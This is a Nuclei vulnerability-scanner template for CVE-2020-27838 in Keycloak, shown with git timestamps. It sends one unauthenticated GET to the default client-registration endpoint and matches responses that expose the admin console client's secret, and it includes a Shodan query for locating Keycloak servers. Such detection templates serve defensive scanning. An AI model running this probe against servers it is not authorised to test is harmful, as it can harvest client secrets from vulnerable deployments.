nuclei-templates/http/cves/2020/CVE-2020-27838.yaml

55 lines
1.9 KiB
YAML
Raw Normal View History

2024-01-16 09:57:16 +00:00
id: CVE-2020-27838
info:
name: KeyCloak - Information Exposure
author: mchklt
severity: medium
description: |
A flaw was found in keycloak in versions prior to 13.0.0. The client registration endpoint allows fetching information about PUBLIC clients (like client secret) without authentication which could be an issue if the same PUBLIC client changed to CONFIDENTIAL later. The highest threat from this vulnerability is to data confidentiality.
2024-01-16 21:13:58 +00:00
impact: |
The vulnerability allows an attacker to gain sensitive information from the KeyCloak server.
remediation: |
Apply the latest security patches or updates provided by the KeyCloak vendor.
reference:
- https://bugzilla.redhat.com/show_bug.cgi?id=1906797
- https://nvd.nist.gov/vuln/detail/CVE-2020-27838
- https://github.com/muneebaashiq/MBProjects
- https://github.com/j4k0m/godkiller
2024-01-16 09:57:16 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2020-27838
cwe-id: CWE-287
epss-score: 0.08135
epss-percentile: 0.93734
cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:*
2024-01-16 09:57:16 +00:00
metadata:
max-request: 1
2024-01-16 09:57:16 +00:00
vendor: redhat
product: keycloak
shodan-query: "title:\"keycloak\""
tags: cve,cve2020,keycloak,exposure
2024-01-16 09:57:16 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/auth/realms/master/clients-registrations/default/security-admin-console"
2024-01-16 09:59:40 +00:00
2024-01-16 09:57:16 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"clientId":"security-admin-console"'
- '"secret":'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 4a0a00473045022100e340099dadc3710a63b8cc3e0182b0c1a738f7480c069fa5c39913092f31b39802201ad2dbae637d451dd3a442b8c8a7d2f0d5244240545b98ba4431a62241c66fa6:922c64590222798bb761d5b6d8e72950